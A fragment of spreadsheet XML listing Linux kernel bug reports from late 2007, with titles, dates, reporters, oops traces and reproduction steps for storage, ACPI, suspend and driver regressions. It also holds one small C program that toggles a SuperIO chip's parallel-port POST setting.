    <t>Most recent kernel where this bug did not occur: -/- Distribution: Gentoo Hardware Environment: Software Environment: System uname: 2.6.23 i686 Intel(R) Celeron(R) CPU 2.66GHz Timestamp of tree: Sun, 28 Oct 2007 21:50:01 +0000 distcc 2.18.3 i686-pc-linux-gnu (protocols 1 and 2) (default port 3632) [disabled] ccache version 2.4 [enabled] app-shells/bash: 3.2_p17 dev-lang/python: 2.4.4-r6 dev-python/pycrypto: 2.0.1-r6 dev-util/ccache: 2.4-r7 sys-apps/baselayout: 1.12.9-r2 sys-apps/sandbox: 1.2.18.1-r2 sys-devel/autoconf: 2.13, 2.61-r1 sys-devel/automake: 1.4_p6, 1.5, 1.6.3, 1.7.9-r1, 1.8.5-r3, 1.9.6-r2, 1.10 sys-devel/binutils: 2.18-r1 sys-devel/gcc-config: 1.3.16 sys-devel/libtool: 1.5.24 virtual/os-headers: 2.6.22-r2 ACCEPT_KEYWORDS="x86" CBUILD="i686-pc-linux-gnu" CFLAGS="-march=pentium4 -O2 -pipe -msse2 -mfpmath=sse -fomit-frame-pointer" CHOST="i686-pc-linux-gnu" Problem Description: First of all: Does it look like a hardware defekt on the controller or is it a bug? If you tent to say its a HW defekt, please let me know and close this bug. When I connect a HDD to a certain port (Interface 3) of the Highpoint RockedRaid 454 the kernel shows the following: ata5.00: ATA-7: Maxtor 5A250J0, RAM51VV0, max UDMA/133 ata5.00: 490234752 sectors, multi 16: LBA48 ata5.01: ATA-7: HDT722525DLAT80, V44OA96A, max UDMA/133 ata5.01: 488397168 sectors, multi 16: LBA48 ata5.00: limited to UDMA/33 due to 40-wire cable ata5.01: limited to UDMA/33 due to 40-wire cable Find mode for 12 reports A81F442 Find mode for 12 reports A81F442 Find mode for DMA 66 reports 120C8242 Find mode for DMA 66 reports 120C8242 ata5.00: configured for UDMA/33 ata5.01: failed to IDENTIFY (I/O error, err_mask=0x2) ata5.01: revalidation failed (errno=-5) ata5: failed to recover some devices, retrying in 5 secs ata5.01: failed to IDENTIFY (I/O error, err_mask=0x2) ata5.01: revalidation failed (errno=-5) ata5.01: limiting speed to UDMA/33:PIO3 ata5: failed to recover some devices, retrying in 5 secs ata5.01: failed to IDENTIFY (I/O error, err_mask=0x2) ata5.01: revalidation failed (errno=-5) ata5.01: disabled ata5: failed to recover some devices, retrying in 5 secs ata5.00: failed to IDENTIFY (I/O error, err_mask=0x40) ata5.00: revalidation failed (errno=-5) ata5: failed to recover some devices, retrying in 5 secs Find mode for 12 reports A81F442 Find mode for DMA 66 reports 120C8242 ata5.00: configured for UDMA/33 ata5: EH pending after completion, repeating EH (cnt=4) Connecting the cable to another port (interface 4) works fine: ata6: PATA max UDMA/100 cmd 0x0001a400 ctl 0x0001a002 bmdma 0x00019808 irq 19 ata6.00: ATA-7: Maxtor 5A250J0, RAM51VV0, max UDMA/133 ata6.00: 490234752 sectors, multi 16: LBA48 ata6.01: ATA-7: HDT722525DLAT80, V44OA96A, max UDMA/133 ata6.01: 488397168 sectors, multi 16: LBA48 Find mode for 12 reports A81F442 Find mode for 12 reports A81F442 Find mode for DMA 69 reports 12848242 Find mode for DMA 69 reports 12848242 ata6.00: configured for UDMA/100 ata6.01: configured for UDMA/100 All other ports (1, 2, 4) are working fine, only port 3 is buggy... Steps to reproduce: Connect UDM100 capable cable to interface 3 of the controller and boot. Reproducable: Alway (with one or with both disks) Full dmsg here: http://olausson.name/temp/HPT374_failed http://olausson.name/temp/HPT374_worked Thanks and regards Bjoern</t>
  </si>
  <si>
    <t>Brightness hotkeys broken with Toshiba laptop</t>
  </si>
  <si>
    <t>2007-10-30 05:33 UTC</t>
  </si>
  <si>
    <t>Danny Baumann</t>
  </si>
  <si>
    <t>2008-09-16 00:11 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.23-rc2 Distribution: Fedora 8 Hardware Environment: Toshiba Satellite Pro A100 laptop (C2D T5500, NV7600Go, ...) Problem Description: From kernel 2.6.23-rc3 onwards, I am no longer able to adjust the brightness of my laptop screen with the Fn+F6/7 keys. 2.6.23-rc3 will just do nothing when pressing them, 2.6.23-rc4 onwards shows up F6/F7 key events when pressing those hotkeys. Manually adjusting the brightness by writing to /proc/acpi/video/VGA/LCD/brightness still works. Manually reverting the embedded controller driver (ec.c) to 2.6.23-rc2 state makes backlight control work again, although key events still are sent. Using git head ec.c doesn't work. Please tell me if any additional information is needed.</t>
  </si>
  <si>
    <t>Remove floppy module freeze</t>
  </si>
  <si>
    <t>2007-11-01 04:11 UTC</t>
  </si>
  <si>
    <t>Aldo Reset</t>
  </si>
  <si>
    <t>2007-12-01 15:43 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: debian etch Hardware Environment: P8SC8 (Supermicro) Software Environment: Gnu Linux Problem Description: No floppy on harware, but floppy module is still loaded and when remove session freeze (not server) and impossible to kill process. Steps to reproduce: In bios diabled floppy, boot debian etch. lsmod ... serio_raw 7428 0 floppy 51684 0 shpchp 33632 0 ... modprobe -r floppy session freeze.... connect with an other session kill -9 process of modprobe -r floppy nothing append.</t>
  </si>
  <si>
    <t>kernel BUG at drivers/md/raid5.c:143</t>
  </si>
  <si>
    <t>2.6.24-rc1-git10</t>
  </si>
  <si>
    <t>2007-11-01 05:03 UTC</t>
  </si>
  <si>
    <t>2007-11-07 16:15 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.23.1 Distribution: Debian Etch 4.0 Hardware Environment: Intel P-III-800 EB (x86_32) 512 MB RAM AIC7xxx SCSI Controller for RAID-1 RootFS sata_sil Controller (3114) with 4x 300GB SATA Disks as RAID-5 Software Environment: mdadm version 2.5.6 Problem Description: shortly after the raid5 array is initialized the kernel stops with kernel BUG at drivers/md/raid5.c:143! invalid opcode: 0000 [#1] Modules linked in: xfs tcp_cubic raid456 async_xor async_memcpy async_tx xor deadline_iosched w83781d hwmon_vid hwmon eeprom netconsole configfs e1000 3c59x mii sata_sil button ata_piix uhci_hcd parport_pc i2c_i801 8250_pnp 8250 serial_core parport evdev usbcore libata i2c_core rng_core intel_agp agpgart pcspkr rtc sg st sr_mod cdrom ch dm_mirror dm_snapshot thermal processor fan unix ext3 jbd mbcache raid1 md_mod sd_mod dm_mod aic7xxx scsi_transport_spi scsi_mod Pid: 1666, comm: md2_raid5 Not tainted (2.6.24-rc1-git10 #1) EIP: 0060:[&lt;e0b019e9&gt;] EFLAGS: 00010002 CPU: 0 EIP is at __release_stripe+0x9f/0x121 [raid456] EAX: 00000000 EBX: c1a0d208 ECX: c1a0d210 EDX: c1a0d208 ESI: c1b4bb00 EDI: c28f6fcc EBP: 00000000 ESP: c28f6f48 DS: 007b ES: 007b FS: 0000 GS: 0000 SS: 0068 Process md2_raid5 (pid: 1666, ti=c28f6000 task=c1952530 task.ti=c28f6000) Stack: 7fffffff 00000282 7fffffff e0b01a79 c1a0d208 e0b06390 7fffffff 7fffffff c28f6fcc 00000000 c0235242 c1afbc00 c1b4bb00 00000003 00000001 c02fa6a0 00000d94 c02fa730 00000000 c02fa640 c1952530 00000008 00000000 c1a0f1e0 Call Trace: [&lt;e0b01a79&gt;] release_stripe+0xe/0x12 [raid456] [&lt;e0b06390&gt;] raid5d+0x33c/0x341 [raid456] [&lt;c0235242&gt;] schedule_timeout+0x13/0x8b [&lt;e08bc69d&gt;] md_thread+0xb5/0xcb [md_mod] [&lt;c0124a81&gt;] autoremove_wake_function+0x0/0x35 [&lt;e08bc5e8&gt;] md_thread+0x0/0xcb [md_mod] [&lt;c012491d&gt;] kthread+0x36/0x5d [&lt;c01248e7&gt;] kthread+0x0/0x5d [&lt;c01046b7&gt;] kernel_thread_helper+0x7/0x10 ======================= Code: e8 30 dc 68 df e9 8e 00 00 00 0f ba 73 20 08 8d 46 38 8b 48 04 8d 53 08 89 50 04 89 43 08 89 4a 04 89 11 eb 73 83 7a 30 00 74 04 &lt;0f&gt; 0b eb fe 0f ba 72 20 05 19 c0 85 c0 74 17 ff 4e 58 83 7e 58 EIP: [&lt;e0b019e9&gt;] __release_stripe+0x9f/0x121 [raid456] SS:ESP 0068:c28f6f48 Steps to reproduce: * Build current -rc Kernel * reboot * assemble an raid5 array * mount the volume from that array * try to read/write data It will crash here a second or two after mounting, but during my tests I've seen it sometimes advances past that point and dies when data is written.</t>
  </si>
  <si>
    <t>Suspend to RAM resume hangs on a tickless (NO_HZ) kernel</t>
  </si>
  <si>
    <t>2007-11-01 14:43 UTC</t>
  </si>
  <si>
    <t>Almonas Petrasevicius</t>
  </si>
  <si>
    <t>2008-04-28 15:52 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: unknown Distribution: Ubuntu 7.10 Hardware Environment: HP nc6320 T2400 945GM Problem Description: notebook hangs on resume after suspend to RAM with tickless (NO_HZ) kernel. This happens both with stock ubuntu 7.10 kernel 2.6.22-14 and with a self compiled vanilla 2.6.23 kernel. It looks like the kernel hangs in a pretty early stage of resume, fan does not even spin down after initial power on spin-up, there is no HDD activity, network interface is dead. Otherwise, notebook resumes just fine with exactly the same kernel configuration w/o NO_HZ config option.</t>
  </si>
  <si>
    <t>Austin Clements</t>
  </si>
  <si>
    <t>Paul Mundt</t>
  </si>
  <si>
    <t>Device mapper regression 2.6.23 vs. v2.6.23-6597-gcfa76f0</t>
  </si>
  <si>
    <t>2.6.23-6597-gcfa76f0</t>
  </si>
  <si>
    <t>2007-11-02 08:19 UTC</t>
  </si>
  <si>
    <t>2007-12-04 02:23 UTC</t>
  </si>
  <si>
    <t>Subject : Device mapper regression 2.6.23 vs. v2.6.23-6597-gcfa76f0 Submitter : Thomas Meyer &lt;thomas@m3y3r.de&gt; References : http://lkml.org/lkml/2007/10/21/153</t>
  </si>
  <si>
    <t>[REGRESSION] 2.6.24-rc1 fails to boot on a 486</t>
  </si>
  <si>
    <t>2007-11-02 08:29 UTC</t>
  </si>
  <si>
    <t>2007-11-07 16:19 UTC</t>
  </si>
  <si>
    <t>Subject : [REGRESSION] 2.6.24-rc1 fails to boot on a 486 Submitter : Mikael Pettersson &lt;mikpe@it.uu.se&gt; References : http://lkml.org/lkml/2007/10/28/195 Handled-By : "H. Peter Anvin" &lt;hpa@zytor.com&gt; Ingo Molnar &lt;mingo@elte.hu&gt; Thomas Gleixner &lt;tglx@linutronix.de&gt;</t>
  </si>
  <si>
    <t>[2.6.24-rc1][BUG] Oops on battery removal</t>
  </si>
  <si>
    <t>2007-11-02 08:41 UTC</t>
  </si>
  <si>
    <t>2007-11-16 14:35 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.24-rc1][BUG] Oops on battery removal Submitter : Rolf Eike Beer &lt;eike-kernel@sf-tec.de&gt; References : http://lkml.org/lkml/2007/11/2/23 Handled-By : Alexey Starikovskiy &lt;astarikovskiy@suse.de&gt; Patch : http://lkml.org/lkml/2007/11/2/71</t>
  </si>
  <si>
    <t>[2.6.24-rc1 regression] AC adapter state does not change after resume</t>
  </si>
  <si>
    <t>2007-11-02 08:47 UTC</t>
  </si>
  <si>
    <t>2007-11-16 14:37 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.24-rc1 regression] AC adapter state does not change after resume Submitter : Andrey Borzenkov &lt;arvidjaar@mail.ru&gt; References : http://lkml.org/lkml/2007/10/30/427 Handled-By : Alexey Starikovskiy &lt;astarikovskiy@suse.de&gt; Patch : http://lkml.org/lkml/2007/10/31/44</t>
  </si>
  <si>
    <t>2.6.24-rc1 eat my photo SD card :-(</t>
  </si>
  <si>
    <t>2007-11-02 09:15 UTC</t>
  </si>
  <si>
    <t>2007-11-16 14:39 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.24-rc1 eat my photo SD card :-( Submitter : Romano Giannetti &lt;romanol@upcomillas.es&gt; References : http://lkml.org/lkml/2007/11/1/99 Handled-By : Nick Piggin &lt;nickpiggin@yahoo.com.au&gt;</t>
  </si>
  <si>
    <t>(ata link pm) Suspend to ram regression (2.6.24-rc1-git)</t>
  </si>
  <si>
    <t>2.6.24-rc1-git</t>
  </si>
  <si>
    <t>2007-11-02 09:23 UTC</t>
  </si>
  <si>
    <t>2007-11-07 16:25 UTC</t>
  </si>
  <si>
    <t>Subject : Suspend to ram regression (2.6.24-rc1-git) Submitter : Jens Axboe &lt;jens.axboe@oracle.com&gt; References : http://lkml.org/lkml/2007/10/31/328 Handled-By : Jens Axboe &lt;jens.axboe@oracle.com&gt; Jeff Garzik &lt;jeff@garzik.org&gt; Kristen Carlson Accardi &lt;kristen.c.accardi@intel.com&gt; Patch : http://lkml.org/lkml/2007/11/1/60</t>
  </si>
  <si>
    <t>2.4.24-rc1-git: crash on shutdown/unmount?</t>
  </si>
  <si>
    <t>2.4.24-rc1</t>
  </si>
  <si>
    <t>2007-11-02 09:29 UTC</t>
  </si>
  <si>
    <t>2007-11-05 01:26 UTC</t>
  </si>
  <si>
    <t>Subject : 2.4.24-rc1-git: crash on shutdown/unmount? Submitter : Alistair John Strachan &lt;alistair@devzero.co.uk&gt; References : http://lkml.org/lkml/2007/10/31/310 Handled-By : Jens Axboe &lt;jens.axboe@oracle.com&gt; Patch : http://lkml.org/lkml/2007/11/1/86</t>
  </si>
  <si>
    <t>100% iowait on one of cpus in current -git</t>
  </si>
  <si>
    <t>2.6.23-mm1 and later</t>
  </si>
  <si>
    <t>2007-11-02 09:39 UTC</t>
  </si>
  <si>
    <t>2007-11-24 11:50 UTC</t>
  </si>
  <si>
    <t>Subject : 100% iowait on one of cpus in current -git Submitter : Maxim Levitsky &lt;maximlevitsky@gmail.com&gt; "Torsten Kaiser" &lt;just.for.lkml@googlemail.com&gt; References : http://lkml.org/lkml/2007/10/22/20 http://lkml.org/lkml/2007/10/31/212 Handled-By : Fengguang Wu &lt;wfg@mail.ustc.edu.cn&gt;</t>
  </si>
  <si>
    <t>pdflush stuck in D state with v2.6.24-rc1-192-gef49c32</t>
  </si>
  <si>
    <t>2.6.24-rc1-gef49c32</t>
  </si>
  <si>
    <t>2007-11-02 09:54 UTC</t>
  </si>
  <si>
    <t>2008-02-15 13:23 UTC</t>
  </si>
  <si>
    <t>Subject : pdflush stuck in D state with v2.6.24-rc1-192-gef49c32 Submitter : Florin Iucha &lt;florin@iucha.net&gt; References : http://lkml.org/lkml/2007/10/28/65 Handled-By : Trond Myklebust &lt;trond.myklebust@fys.uio.no&gt; Fengguang Wu &lt;wfg@mail.ustc.edu.cn&gt;</t>
  </si>
  <si>
    <t>aim7 -30% regression in 2.6.24-rc1</t>
  </si>
  <si>
    <t>2007-11-02 10:13 UTC</t>
  </si>
  <si>
    <t>2007-11-07 15:37 UTC</t>
  </si>
  <si>
    <t>Subject : aim7 -30% regression in 2.6.24-rc1 Submitter : "Zhang, Yanmin" &lt;yanmin_zhang@linux.intel.com&gt; References : http://lkml.org/lkml/2007/10/26/128 Handled-By : Ingo Molnar &lt;mingo@elte.hu&gt; Peter Zijlstra &lt;a.p.zijlstra@chello.nl&gt; Patch : http://lkml.org/lkml/2007/10/31/131</t>
  </si>
  <si>
    <t>kernel bug from pktcdvd</t>
  </si>
  <si>
    <t>2007-11-02 13:42 UTC</t>
  </si>
  <si>
    <t>Gerhard Doeppert</t>
  </si>
  <si>
    <t>2007-11-13 03:20 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.22 Distribution: - (opensuse based) Hardware Environment: pc, amd64x2, dvd writer Software Environment: shell, x86_64 and i686 kernels Problem Description: When I try to setup packet writing on any ide block device using the sysfs interface, I get a segfault and dmesg shows a message about a kernel bug in pkt_setup_dev+0x476/0x480 [pktcdvd]. Steps to reproduce: modprobe pktcdvd echo 22:0 &gt;/sys/class/pktcdvd/add Message from dmesg (using i686 kernel): ------------[ cut here ]------------ Kernel BUG at f8ef7bf6 [verbose debug info unavailable] invalid opcode: 0000 [#1] SMP Modules linked in: pktcdvd udf cls_fw ipt_REJECT xt_limit xt_state xt_TCPMSS xt_tcpudp iptable_filter ipt_MASQUERADE iptable_nat nf_conntrack_ipv4 ip_tables nf_nat_ftp nf_nat nf_conntrack_ftp nf_conntrack ipt_LOG x_tables sch_htb sis900 bitrev crc32 nfsd exportfs lockd auth_rpcgss sunrpc snd_pcm_oss snd_seq_oss snd_mixer_oss snd_seq_midi snd_seq_midi_event snd_seq snd_ens1371 snd_ac97_codec ac97_bus snd_usb_audio snd_pcm snd_timer snd_page_alloc snd_usb_lib snd_rawmidi snd_seq_device snd_hwdep ehci_hcd ohci_hcd forcedeth dummy k8temp w83627ehf hwmon_vid usb_storage aes_i586 dm_crypt dm_mod loop tuner tvaudio bttv video_buf firmware_class ir_common compat_ioctl32 i2c_algo_bit btcx_risc tveeprom i2c_core videodev v4l1_compat v4l2_common usblp ppdev parport_pc lp parport pppoe pppox ppp_generic slhc usbhid floppy ide_cd cdrom cpufreq_ondemand cpufreq_performance cpufreq_powersave rtc CPU: 0 EIP: 0060:[&lt;f8ef7bf6&gt;] Not tainted VLI EFLAGS: 00210246 (2.6.23 #1) EIP is at pkt_setup_dev+0x476/0x480 [pktcdvd] eax: 00000000 ebx: 01600040 ecx: c23820c4 edx: f8efdd80 esi: f5613880 edi: 00000000 ebp: f64cf200 esp: f4b5decc ds: 007b es: 007b fs: 00d8 gs: 0033 ss: 0068 Process pktcdvd (pid: 4290, ti=f4b5c000 task=f49ceab0 task.ti=f4b5c000) Stack: f5613888 f8ef9ee8 00000000 f4b5df08 f4b5df38 f4b5df38 00000000 f5613888 00000000 f6fa1040 f4b5df38 f54d9000 00000002 ffffffff f8ef9f23 f54d9005 00000006 f534a418 00000006 f534a418 f54d9000 00000006 f8ef7c49 f54d9000 Call Trace: [&lt;f8ef7c49&gt;] class_pktcdvd_store_add+0x49/0x60 [pktcdvd] [&lt;f8ef7c00&gt;] class_pktcdvd_store_add+0x0/0x60 [pktcdvd] [&lt;c0310e79&gt;] class_attr_store+0x29/0x40 [&lt;c01a9d2a&gt;] sysfs_write_file+0xda/0x120 [&lt;c01a9c50&gt;] sysfs_write_file+0x0/0x120 [&lt;c016e8bf&gt;] vfs_write+0xbf/0x140 [&lt;c016ef41&gt;] sys_write+0x41/0x70 [&lt;c010426e&gt;] sysenter_past_esp+0x5f/0x85 ======================= Code: 04 24 d4 a2 ef f8 e8 ca fa 22 c7 8b 44 24 24 e8 21 b6 29 c7 b8 80 dd ef f8 e8 77 08 25 c7 c7 44 24 20 f4 ff ff ff e9 7a fd ff ff &lt;0f&gt; 0b eb fe 8d b6 00 00 00 00 53 89 cb 83 ec 18 8d 44 24 10 89 EIP: [&lt;f8ef7bf6&gt;] pkt_setup_dev+0x476/0x480 [pktcdvd] SS:ESP 0068:f4b5decc</t>
  </si>
  <si>
    <t>Dell Optiplex GX240, system will not power-off on halt</t>
  </si>
  <si>
    <t>2007-11-02 18:41 UTC</t>
  </si>
  <si>
    <t>Jeff</t>
  </si>
  <si>
    <t>2008-01-10 19:13 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: unknown Distribution: Gentoo Hardware Environment: See: http://howto.wikia.com/wiki/Howto_configure_the_Linux_kernel_for_a_Dell_Optiplex_computer Software Environment: Problem Description: Dell Optiplex GX240, system will not power-off on halt known to occur versions: 2.6.19-2.6.22 (untested for any other version) Work around: http://howto.wikia.com/wiki/Howto_get_the_Linux_kernel_to_properly_power_down_the_Dell_Optiplex_GX240_using_ACPI Steps to reproduce: kernel compiled with * Processor family (Pentium-4/Celeron(P4-based)/Pentium-4 M/old... * SMT (Hyperthreading) scheduler support * ACPI Support Shutdown command executed: /sbin/shutdown -h -t 30 1 "yo the computers shuting down" OR /sbin/shutdown -h -P -t 30 1 "yo the computers shuting down"</t>
  </si>
  <si>
    <t>2.6.24-rc1-54866f032307063776b4eff7eadb131d47f9f9b4 fails to boot: kernel BUG at include/linux/scatterlist.h:49!</t>
  </si>
  <si>
    <t>2.6.24-rc1-54866f032307063776b4eff7eadb131d47f9f9b4</t>
  </si>
  <si>
    <t>2007-11-03 03:33 UTC</t>
  </si>
  <si>
    <t>2007-11-05 11:17 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.24-rc1-54866f032307063776b4eff7eadb131d47f9f9b4 fails to boot: kernel BUG at include/linux/scatterlist.h:49! Submitter : "Torsten Kaiser" &lt;just.for.lkml@googlemail.com&gt; References : http://lkml.org/lkml/2007/11/2/240 Handled-By : Jens Axboe &lt;jens.axboe@oracle.com&gt; Stefan Richter &lt;stefanr@s5r6.in-berlin.de&gt;</t>
  </si>
  <si>
    <t>v2.6.24-rc1-497-gb1d08ac: kde battery icon gone</t>
  </si>
  <si>
    <t>2.6.24-rc1-497-gb1d08ac</t>
  </si>
  <si>
    <t>2007-11-03 10:48 UTC</t>
  </si>
  <si>
    <t>2007-11-16 14:45 UTC</t>
  </si>
  <si>
    <t>Subject : [regression] v2.6.24-rc1-497-gb1d08ac: kde battery icon gone Submitter : Thomas Meyer &lt;thomas@m3y3r.de&gt; References : http://lkml.org/lkml/2007/11/2/165 Handled-By : Andrey Borzenkov &lt;arvidjaar@mail.ru&gt; Ingo Molnar &lt;mingo@elte.hu&gt; Note : goes away if ACPI_PROCFS is set</t>
  </si>
  <si>
    <t>LPC IT8705 POST port making noise on parallel port</t>
  </si>
  <si>
    <t>tested on 2.0.33, 2.4.29, 2.6.16, probably all versions</t>
  </si>
  <si>
    <t>2007-11-04 08:58 UTC</t>
  </si>
  <si>
    <t>Petr Cvek</t>
  </si>
  <si>
    <t>2008-01-29 08:37 UTC</t>
  </si>
  <si>
    <t>Hardware Environment: LPC chip ITE IT8705, mainboard ECS K7S5A, SIS735 Problem Description: Low pin controller IT8705 has special function, which sends data from POST port 0x80 (default) to pins of parallel port. This function is default enabled, but BIOS disables it before boot. While booting, kernel probably resets this chip again and doesn't disable POST function. Then all programs, that have outb delay send data to parallel port and make noise on it. This makes PLIP connection works very bad with this chip, but doesn't affect printing (probably beacause printer using handshake wires). Reference: datasheet page 63 and 64 http://www.alldatasheet.com/datasheet-pdf/pdf/117633/ETC/IT8705F.html Very simple (and I don't know how it's correct) C source below makes example. It inverts bit disable/enable POST. /*Program for disabling/enabling IT8705 parallel port POST mode, Petr Cvek, petr.cvek@tul.cz*/ #include &lt;stdio.h&gt; #include &lt;unistd.h&gt; #include &lt;asm/io.h&gt; #define IT8705 0x2e /*first SuperIO index=0x2e, second SuperIO index=0x4e*/ int write8705(int index,int data) { outb(index, IT8705); usleep(100); outb(data, IT8705+1); usleep(100); return(0); } int read8705(int index) { outb(index, IT8705); usleep(100); return(inb(IT8705+1)); usleep(100); } int main() { /*ALOCATE IT8705 PORTS*/ if (ioperm(IT8705, 3, 1)) { perror("ioperm"); exit(1); } if (ioperm(IT8705+1, 3, 1)) { perror("ioperm"); exit(1); } /*ENTER IT8705 CONFIG MODE*/ outb(0x87, IT8705); usleep(100); outb(0x01, IT8705); usleep(100); outb(0x55, IT8705); usleep(100); if (IT8705==0x2e) { outb(0x55, IT8705); usleep(100); printf("First SuperIO\n"); } else if (IT8705==0x4e) { outb(0xaa, IT8705); usleep(100); printf("Second SuperIO\n"); } /*POINT TO PART OF IT8705 TO BE MODIFICATED*/ write8705(0x7, 0x3); /*parport*/ /*READ DATA BEFORE CHANGE*/ printf("Parport config reg before change: %d\n", read8705(0xf0)); /*PARALEL PORT CONFIG ENABLE/DISABLE POST ON PARPORT*/ write8705(0xf0,(read8705(0xf0) + 0x8)); /*bit 3 POST, bits 4-7 reserved*/ /*READ DATA AFTER CHANGE*/ printf("Parport config reg after change: %d\n", read8705(0xf0)); /*EXIT CONFIG MODE*/ write8705(0x2,0x2); /*UNALOCATE IT8705 PORTS*/ if (ioperm(IT8705+1, 3, 0)) { perror("ioperm"); exit(1); } if (ioperm(IT8705, 3, 0)) { perror("ioperm"); exit(1); } /*END*/ exit(0); }</t>
  </si>
  <si>
    <t>_GTM complains - PATA scan: ACPI Exception AE_AML_PACKAGE_LIMIT... is beyond end of object</t>
  </si>
  <si>
    <t>Linux version 2.6.24-rc2</t>
  </si>
  <si>
    <t>2007-11-07 13:34 UTC</t>
  </si>
  <si>
    <t>Hans de Bruin</t>
  </si>
  <si>
    <t>2007-12-20 15:37 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: I rebuild daily, if rebuild script does not fail. The last errorless boot was on october 29. The first boot after this was october 31 Distribution: slack Hardware Environment: VIA C7, CN700 IDE interface: VT82C586A/B/VT82C686/A/B/VT823x/A/C Diskless PXE boot Software Environment: Problem Description: dmesg: ata3: PATA max UDMA/133 cmd 0x1f0 ctl 0x3f6 bmdma 0xf900 irq 14 ata4: PATA max UDMA/133 cmd 0x170 ctl 0x376 bmdma 0xf908 irq 15 ACPI Exception (exoparg2-0442): AE_AML_PACKAGE_LIMIT, Index (0FFFFFFFF) is beyond end of object [20070126] ACPI Error (psparse-0537): Method parse/execution failed [\_SB_.PCI0.PATA.GTM_] (Node c1c0b420), AE_AML_PACKAGE_LIMIT ACPI Error (psparse-0537): Method parse/execution failed [\_SB_.PCI0.PATA.CHN0._GTM] (Node c1c0b228), AE_AML_PACKAGE_LIMIT ata3: ACPI get timing mode failed (AE 0x300d) ACPI Exception (exoparg2-0442): AE_AML_PACKAGE_LIMIT, Index (0FFFFFFFF) is beyond end of object [20070126] ACPI Error (psparse-0537): Method parse/execution failed [\_SB_.PCI0.PATA.GTM_] (Node c1c0b420), AE_AML_PACKAGE_LIMIT ACPI Error (psparse-0537): Method parse/execution failed [\_SB_.PCI0.PATA.CHN1._GTM] (Node c1c0b330), AE_AML_PACKAGE_LIMIT ata4: ACPI get timing mode failed (AE 0x300d)</t>
  </si>
  <si>
    <t>net: skge breakage on 2.6.24-rc1</t>
  </si>
  <si>
    <t>2007-11-07 14:27 UTC</t>
  </si>
  <si>
    <t>2007-11-16 14:58 UTC</t>
  </si>
  <si>
    <t>Subject : net: skge breakage on 2.6.24-rc1 Submitter : Heikki Orsila &lt;shdl@zakalwe.fi&gt; References : http://lkml.org/lkml/2007/11/7/281</t>
  </si>
  <si>
    <t>2.6.24-rc1: pata_amd fails to detect 80-pin wire</t>
  </si>
  <si>
    <t>2007-11-07 14:48 UTC</t>
  </si>
  <si>
    <t>2007-12-07 17:20 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.24-rc1: pata_amd fails to detect 80-pin wire Submitter : "Thomas Lindroth" &lt;thomas.lindroth@gmail.com&gt; References : http://lkml.org/lkml/2007/11/7/152</t>
  </si>
  <si>
    <t>2.6.24-rc1 - Regularly getting processes stuck in D state on startup</t>
  </si>
  <si>
    <t>2007-11-07 15:44 UTC</t>
  </si>
  <si>
    <t>2007-11-16 15:07 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.24-rc1 - Regularly getting processes stuck in D state on startup Submitter : David &lt;david@unsolicited.net&gt; Confirmed-by : Stephen Rothwell &lt;sfr@canb.auug.org.au&gt; References : http://lkml.org/lkml/2007/11/5/229 Handled-By : Peter Zijlstra &lt;peterz@infradead.org&gt; Fengguang Wu &lt;wfg@mail.ustc.edu.cn&gt; Patch : http://lkml.org/lkml/2007/11/6/33</t>
  </si>
  <si>
    <t>2.6.24-rc2 (esthetic?) regression: auto select interrupt bouncing</t>
  </si>
  <si>
    <t>2007-11-08 04:30 UTC</t>
  </si>
  <si>
    <t>Romano Giannetti</t>
  </si>
  <si>
    <t>2008-10-17 21:27 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.24-rc1 Distribution: Ubuntu Feisty Hardware Environment: Laptop Toshiba Satellite U305-S5077 Problem Description: After the ACPI changes between 2.6.24-rc1 and -rc2 I have my logs "spammed" (every 2-3 seconds) by: [ 423.112903] ACPI: EC: missing IBF_1 confirmations,switch off interrupt mode. [ 423.113020] ACPI: EC: non-query interrupt received, switching to interrupt mode [ 426.078972] ACPI: EC: missing IBF_1 confirmations,switch off interrupt mode. [ 426.079645] ACPI: EC: non-query interrupt received, switching to interrupt mode [ 426.622773] ACPI: EC: missing IBF_1 confirmations,switch off interrupt mode. [ 426.622889] ACPI: EC: non-query interrupt received, switching to interrupt mode It seems that no harm is done, apart (but it could be another thing) that gnome-panel is much slower on startup.</t>
  </si>
  <si>
    <t>blk_queue_invalidate_tags() does not work as expected</t>
  </si>
  <si>
    <t>2007-11-08 06:52 UTC</t>
  </si>
  <si>
    <t>juergen kadidlo</t>
  </si>
  <si>
    <t>2007-11-19 01:50 UTC</t>
  </si>
  <si>
    <t>Hardware Environment: x86 Problem Description: 2 problems with "blk_queue_invalidate_tags()": a.) when "blk_queue_invalidate_tags()" is called, "__elv_add_request()" and "elv_insert()" are called with insert location ELEVATOR_INSERT_BACK. Because of this, "elv_insert()" unplugs the request-queue and directly calls the drivers request-function (without even checking if the queue has been stopped by calling "blk_stop_queue()"). Generally speaking, it is not a good behaviour to call the drivers request-function from "blk_queue_invalidate_tags()" since this function is intended to be called when an error occures during request-processing! Such a behaviour can even lead to an endless loop if the driver is calling "blk_queue _invalidate_tags()" from within the context of the request-function... In my concrete case, I expect the tags and requests to be returned to the pool and queue resp., to be able to process the requests later, when the error has been handled... b.) requeued requests are not deactivated by "blk_queue_invalidate_tags()". This leads to a kernel warning and a stack dump caused by "as_activate_request()" in "as-iosched.c". Possible PATCH: instead of calling "__elv_add_request()" call "elv_requeue_request()"! The latter function not only deactivates the request if necc. but also calls "elv_insert()" with location ELEVATOR_INSERT_REQUEUE, thus preventing the latter function from unplugging the queue and calling the request-function. I wrote a Patch that does exactly this and it works (as far as I can tell). Steps to reproduce: Dequeue some requests by calling "blk_start_tag()" and call "blk_queue_invalidate_tags()" after that (and imagine that an error occured that prevents the driver from processing any further requests for a while...).</t>
  </si>
  <si>
    <t>ext4: delalloc space accounting problem drops data</t>
